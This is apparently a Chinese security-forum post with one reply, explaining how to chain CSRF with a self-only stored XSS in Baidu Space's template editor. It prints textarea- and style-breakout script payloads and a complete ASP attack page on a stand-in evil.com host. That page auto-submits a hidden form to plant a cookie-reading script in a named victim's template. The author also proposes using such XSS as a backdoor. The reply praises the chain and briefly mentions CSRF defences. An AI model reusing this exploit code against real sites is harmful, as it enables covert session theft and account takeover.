反射型XSS的利用一（基于CSRF的XSS攻击）

08xjxg

有些XSS不好利用啊，比如有些后台的XSS漏洞，你进不了别人的后台，怎么能 利用他的XSS漏洞呢？进得了别人的后台，还利用这个XSS漏洞干什么？其实这个时候可以种个后门（如果那是个持久型的XSS，这是后话）。有些被称为鸡肋的XSS漏洞其实很多时候是因为没有找到合适的利用方式而已。

比如百度空间的自定义模板处，那里还有两处持久型的XSS漏洞，一个是在编辑CSS的textarea中写入这样的代码
</textarea><script>alert(‘xss’)< /script><textarea>，然后保存该模板后会出现跨站；还有一个是在编辑CSS的textarea中写入< /style><script>alert(document.cookie)< /script><style>，点击“预览”会出现跨站。这样的过程似乎只能跨自己？不对！利用CSRF可以使得这些不好利用的 XSS漏洞变得同样威力无穷。

比如：
一个攻击者构造的页面http://www.evil.com/csrf-xss-baiduhi.asp的代码如下：
<%
s = "<form method='post' action='http://hi.baidu.com/yuxi4n/commit'>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='5' name='ct'/>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='1' name='spCssUse'/>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='1' name='spCssColorID'/>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='-1' name='spCssLayoutID'/>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='http://hi.baidu.com/yuxi4n/modify/spcss/20f51f4f94129a36aec3ab11.css/edit' name='spRefURL'/>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='5' name='cm'/>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='</style><script>alert(document.cookie)</script><style>' name='spCssText'/>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='abc' name='spCssName'/>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='0' name='spCssTag'/>"
s = s+"</form>"
s = s+"<script>document.forms[0].submit();</script>"
Response.write(s)
%>
被攻击者yuxi4n访问这个链接时就被CSRF了，接着就是XSS的出现。XSS能做什么就做什么了。上面的CSRF代码提交了自定义模板表 单并执行了预览功能。预览的时候就跨了。CSRF可以做的很隐蔽。

同样的问题出现在很多网站上，恩，假如CSRF防御做得好的话就不用担心这个了，不过我们可以利用这样被忽略的XSS漏洞做后门，假如有这个机会的话。

小结：
意思就是在我们自己得空间存在跨站漏洞实现过程，放到受害者空间中执行之久ok。所以利用CSRF伪造请求后，受害者用户点击链接后就触发了漏洞，执行了跨站。。。

热心网友2

在反射型XSS的利用上，结合CSRF确实能让一些看似“鸡肋”的漏洞变成有效的攻击链，楼主的思路很清晰。你举的百度空间例子很有代表性：利用CSRF伪造表单提交，让受害者在不知情的情况下触发自定义模板中的XSS，从而窃取cookie或执行其他操作。这种组合攻击的隐蔽性很高，也提醒我们，即使是需要用户交互的XSS，只要结合CSRF，攻击面就会显著扩大。 另外，你提到的“后门”思路也很有启发性——如果能在持久型XSS中植入长期有效的代码，结合CSRF就可以反复利用。不过这也对防御提出了更高的要求：除了对用户输入做严格的过滤和转义，CSRF的防护（如Token验证、Referer检查）同样关键。楼主对这类漏洞的分析很务实，期待后续关于持久型XSS后门利用的分享。